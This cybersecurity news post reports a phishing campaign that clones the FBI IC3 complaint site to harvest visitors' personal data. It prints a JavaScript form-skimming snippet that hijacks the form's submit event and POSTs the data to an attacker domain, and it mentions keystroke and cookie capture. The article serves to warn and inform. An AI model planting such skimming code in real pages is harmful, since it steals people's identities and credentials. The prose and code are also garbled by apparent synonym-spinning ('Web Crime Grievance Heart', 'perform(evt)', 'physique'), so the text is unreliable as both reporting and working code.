Skip to content
  • Blog Home
  • Cyber Map
  • About Us – Contact
  • Disclaimer
  • Terms and Rules
  • Privacy Policy
Cyber Web Spider Blog – News

Cyber Web Spider Blog – News

Globe Threat Map provides a real-time, interactive 3D visualization of global cyber threats. Monitor DDoS attacks, malware, and hacking attempts with geo-located arcs on a rotating globe. Stay informed with live logs and archive stats.

  • Home
  • Cyber Map
  • Cyber Security News
  • Security Week News
  • The Hacker News
  • How To?
  • Toggle search form

Threat Actors Impersonate FBI IC3 Website to Steal The Visitors’ Personal Information

Posted on September 22, 2025September 22, 2025 By CWS

A complicated spoofing marketing campaign has emerged concentrating on the Federal Bureau of Investigation’s Web Crime Grievance Heart (IC3).

Starting in mid-September 2025, victims making an attempt to entry IC3’s official portal had been redirected to fraudulent domains crafted to reflect the official web site.

The impersonators employed look-alike URLs—akin to “ic3-gov.com” and “ic3gov.org”—and reproduced genuine branding, together with the FBI seal and IC3 banner.

Guests who entered private knowledge discovered their data harvested for identification theft and monetary fraud.

IC3 analysts recognized the primary wave of those fraudulent websites on September 18, 2025, when a number of stories surfaced of tourists receiving misleading emails purportedly confirming IC3 report submissions.

These messages contained hyperlinks that led to cloned pages demanding in depth personally identifiable data (PII).

Though the preliminary entry level resembled a routine affirmation discover, the marketing campaign’s underlying payload quietly exfiltrated all kind knowledge to attacker-controlled servers.

Following these early alerts, IC3 researchers famous that the spoofed infrastructure was hosted through bulletproof suppliers, enabling fast area rotation and minimal takedown functionality.

Victims who tried to “report” crimes or replace present stories unwittingly supplied names, house addresses, cellphone numbers, e mail credentials, Social Safety numbers, and banking data—all transmitted in clear textual content over HTTP.

In some instances, the cloned pages hid extra JavaScript modules designed to seize keystrokes and cookies, additional compromising customer safety.

An infection Mechanism and Knowledge Harvesting

The malicious websites function purely by phishing and client-side scripting. Upon loading, a JavaScript snippet intercepts the official kind’s submit occasion, rerouting person inputs to an exfiltration endpoint earlier than permitting the browser to proceed or show a generic error.

A consultant snippet illustrates this tactic:-

doc.querySelector(‘kind#complaintForm’).addEventListener(‘submit’, perform(evt) {
evt.preventDefault();
var formData = new FormData(this);
fetch(‘https://malicious-ic3[.]internet/acquire’, {
methodology: ‘POST’,
physique: formData
}).then(() => this.submit());
});

This strategy permits seamless knowledge seize with out alerting the sufferer. The script additionally logs keystrokes through an injected listener on all enter fields, amassing credentials and session cookies.

As a result of the code is embedded immediately within the web page’s HTML, conventional antivirus options counting on signature-based detection wrestle to flag the risk.

Subsequent community evaluation revealed repeated POST requests to the malicious area shortly after every kind submission, confirming profitable knowledge exfiltration.

Professionals are urged to confirm the URL, guarantee HTTPS with a legitimate .gov certificates, and report any suspicious IC3-branded pages to the FBI instantly.

Discover this Story Attention-grabbing! Comply with us on Google Information, LinkedIn, and X to Get Extra On the spot Updates.

Cyber Security News Tags:Actors, FBI, IC3, Impersonate, Information, Personal, Steal, Threat, Visitors, Website

Post navigation

Previous Post: How to Gain Control of AI Agents and Non-Human Identities
Next Post: HoundBytes Launches Automated Security Analyst

Related Posts

Authorities Dismantled AVCheck, a Tool For Testing Malware Against Antivirus Detection Cyber Security News
Cisco IOS and IOS XE Software Vulnerabilities Let Attackers Execute Remote Code Cyber Security News
New Quantum Route Redirect Tool Lets Attackers Launch One-Click Phishing Attacks on Microsoft 365 Users Cyber Security News
2025 Insider Risk Report Finds Most Organizations Struggle to Detect and Predict Insider Risks Cyber Security News
Threat Actors Leverage ChatGPT to Attack Mac Devices With AMOS InfoStealer Cyber Security News
Cisco Desk, IP, and Video Phone Vulnerabilities Let Remote Attackers Trigger DoS And XSS Attacks Cyber Security News

Categories

  • Cyber Security News
  • How To?
  • Security Week News
  • The Hacker News

Recent Posts

  • DIG AI – Darknet AI Tool Enabling Threat Actors to Launch Sophisticated Attacks
  • Android Malware Operations Merge Droppers, SMS Theft, and RAT Capabilities at Scale
  • Cybersecurity Weekly Recap – PornHub Breach, Cisco 0-Day, Amazon Detains DPRK IT Worker, and more
  • Iranian Infy APT Resurfaces with New Malware Activity After Years of Silence
  • 100+ Cisco Secure Email Devices Exposed to Zero‑Day Exploited in the Wild

Pages

  • About Us – Contact
  • Disclaimer
  • Privacy Policy
  • Terms and Rules

Archives

  • December 2025
  • November 2025
  • October 2025
  • September 2025
  • August 2025
  • July 2025
  • June 2025
  • May 2025

Recent Posts

  • DIG AI – Darknet AI Tool Enabling Threat Actors to Launch Sophisticated Attacks
  • Android Malware Operations Merge Droppers, SMS Theft, and RAT Capabilities at Scale
  • Cybersecurity Weekly Recap – PornHub Breach, Cisco 0-Day, Amazon Detains DPRK IT Worker, and more
  • Iranian Infy APT Resurfaces with New Malware Activity After Years of Silence
  • 100+ Cisco Secure Email Devices Exposed to Zero‑Day Exploited in the Wild

Pages

  • About Us – Contact
  • Disclaimer
  • Privacy Policy
  • Terms and Rules

Categories

  • Cyber Security News
  • How To?
  • Security Week News
  • The Hacker News

Copyright © 2025 Cyber Web Spider Blog – News.

Powered by PressBook Masonry Dark